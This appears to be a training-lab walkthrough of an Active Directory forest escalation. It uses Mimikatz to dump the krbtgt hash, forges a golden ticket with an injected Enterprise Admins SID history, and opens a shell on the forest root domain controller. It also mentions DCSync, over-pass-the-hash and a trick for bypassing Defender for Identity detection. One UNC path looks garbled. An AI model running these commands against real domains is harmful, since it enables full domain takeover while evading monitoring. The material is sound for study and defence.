Using KRBTGT Hash

We abuse sIDhistory again. First, we dump the credentials and obtain krbtgt of dcorp-dc.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

We can forge the inter-realm TGT for Administrator and inject it.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

In the above command, the mimkatz option "/sids" is forcefully setting the sIDHistory for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group.

We can now access mcorp:

winrs -r:mcorp-dc.moneycorp.local cmd

• On any machine of the current domain

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

• We can now run commands on the remote machine

ls \\mcorp-dc.moneycorp.local.kirbi\c$

gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

• If you can't access shell on the remote system with winrs, in case you get an error as shown in the screen shot below, here is what to do to get a shell 🤟 (DCsync)

1. Run the dcsync attack against the krbtgt hash of the forest root

1. Now use over-passthehash to start a process as the administrator of moneycorp.local of this domain we want the request to be sent to

• You should now have a new process running as domain administrator of mcorp-dc, run the winrs command again and you should have shell access

• Avoid suspicious logs by using Domain Controllers group (Bypass MDI Detection) Note: /user:dcorp-dc$ used to work earlier (till April 2023) but now we need to user /user:Administrator

Domain SID's -:

• S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers

• S-1-5-9 - Enterprise Domain Controllers